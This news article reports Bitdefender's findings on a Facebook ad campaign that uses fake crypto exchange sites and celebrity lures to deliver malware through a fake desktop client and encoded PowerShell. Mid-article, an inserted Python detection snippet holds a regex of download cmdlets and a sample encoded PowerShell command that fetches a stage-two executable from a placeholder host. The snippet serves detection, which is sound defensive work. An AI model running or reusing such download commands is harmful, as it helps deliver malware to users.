Bitdefender exposes Facebook ad scams that use fake crypto sites and celebrity lures to spread malware via malicious desktop clients and PowerShell scripts.
A persistent malware campaign is exploiting Facebook's advertising network to target cryptocurrency enthusiasts, security researchers at Bitdefender revealed today.
The operation leverages the trusted names of major cryptocurrency exchanges such as Binance and TradingView, along with images of celebrities such as Elon Musk and Zendaya, in Facebook ads to lend credibility to the fake cryptocurrency exchange promotions and lure unsuspecting users into downloading malicious software.

Bitdefender's investigation, shared with Hackread.com ahead of its publication, found a multi-layered attack that delivers malware through a covert communication channel between the website and the victim's own computer.
According to the researchers, cybercriminals are hijacking Facebook accounts or creating fake ones to run deceptive ads promising quick financial gains or crypto bonuses. Clicking these ads redirects victims to convincing but fraudulent websites that mimic legitimate cryptocurrency platforms and urge them to download a "desktop client."
Once downloaded, the desktop client drops a malicious DLL file, which launches a local .NET-based server on the victim's machine. This server acts as a hidden C2 centre. The fake website's front end contains a deobfuscated script that communicates with the server, sends WMI (Windows Management Instrumentation) queries, and instructs it to execute further malicious payloads.
The final stage often involves the execution of multiple encoded PowerShell scripts, which download further malware from remote servers. Furthermore, the attackers implement advanced anti-sandbox checks, ensuring that the malware is only delivered to users who meet specific demographic and behavioural profiles deemed valuable by the cybercriminals.
Bitdefender researcher Ionut Baltariu highlighted that users without specific Facebook ad tracking parameters, those not logged into Facebook, or those with uninteresting IP addresses or operating systems are shown harmless content instead. This targeted approach allows the attackers to maximize their impact while minimizing exposure to security analysis.
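As an added defender-side illustration (not code from Bitdefender or from the article): the chain above ends with encoded PowerShell, spawned by a supposed "desktop client", that fetches more malware, so one practical check is to decode `-EncodedCommand` payloads found in process-creation logs and flag those that reach out to the network. The log line format, process names and URL below are constructed assumptions.

```python
import base64
import re
from typing import Optional

# Fetching cmdlets/methods; their presence in a decoded -EncodedCommand payload
# marks the "download further malware" stage described above.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|Net\.WebClient", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 token.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan(lines):
    """One finding per encoded PowerShell launch: who spawned it and whether
    the decoded script reaches out to the network."""
    findings = []
    for line in lines:
        parent, image, cmdline = line.split("|", 2)
        if image.lower() != "powershell.exe":
            continue
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        findings.append({"parent": parent,
                         "downloads": bool(DOWNLOAD_RE.search(script)),
                         "script": script})
    return findings

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample log lines (parent|image|command line), not from the report.
SAMPLE_LOG = [
    "explorer.exe|notepad.exe|notepad.exe notes.txt",
    "BinanceDesktop.exe|powershell.exe|powershell.exe -nop -w hidden -enc "
    + encode_ps("Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile $env:TEMP\\u.exe"),
    "svchost.exe|powershell.exe|powershell.exe -enc "
    + encode_ps("Get-Service | Where-Object Status -eq 'Running'"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['parent']:>20} -> downloads={f['downloads']}: {f['script'][:60]}")
```

Encoded commands that merely query the system (the svchost.exe line) are reported but not marked as downloading; an unfamiliar parent process with a downloading payload is the combination worth triaging first.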
100 Malicious Ads in Just 24 Hours
The scale of the operation is significant: researchers have identified hundreds of Facebook accounts actively promoting these malicious pages. In one case, a single page ran over 100 ads in just 24 hours.
While Facebook often removes these fraudulent ads, many gather thousands of views before being taken down. The targeting is often finely tuned, with one case focusing on men aged 18 and over in Bulgaria and Slovakia.
Adding another layer of deception, the attackers have even created fake Facebook pages that perfectly mirror the official pages of platforms such as TradingView, complete with fabricated posts and comments touting fake giveaways. However, the links embedded in these fake pages lead directly to the malware-distributing websites.
Facebook's continued role as a vector for malware distribution is difficult to ignore given earlier findings, including today's discovery from Morphisec showing that cybercriminals have been using deceptive Facebook ads promoting fake AI platforms to distribute the new Noodlophile Stealer.
It also shows how cybercriminals exploit the platform's reach and advertising capabilities for malicious purposes, emphasizing the need for user vigilance and platform security enhancements.
Bitdefender advises users to be cautious of online ads, use scam and link-checking tools, keep security software updated and report suspicious ads on Facebook to stay protected.